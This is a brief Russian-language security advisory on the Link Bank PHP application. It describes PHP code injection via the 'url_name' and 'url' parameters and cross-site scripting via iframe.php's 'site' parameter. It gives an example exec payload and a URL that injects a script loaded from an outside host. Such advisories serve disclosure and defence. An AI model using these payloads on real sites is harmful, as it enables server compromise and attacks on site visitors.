Программа: Link Bank, возможно более ранние
версии

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
выполнить произвольный PHP сценарий на
системе.

1. Уязвимость существует из-за
недостаточной обработки входных данных в
параметрах "url_name" и "url" во время
добавления ссылки. Удаленный пользователь
может с помощью специально сформированного
запроса выполнить произвольный PHP код на
целевой системе с привилегиями Web сервера.

Пример:

<?php exec($cmd) ?>

2. Уязвимость существует из-за
недостаточной обработки входных данных в
параметре "site" сценария "iframe.php".
Удаленный пользователь может с помощью
специально сформированного запроса
выполнить произвольный код сценария в
браузере жертвы в контексте безопасности
уязвимого сайта.

Пример:

http://example.com/iframe.php?site=%3C/title%3E%3C/head %3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E

Оставить мнение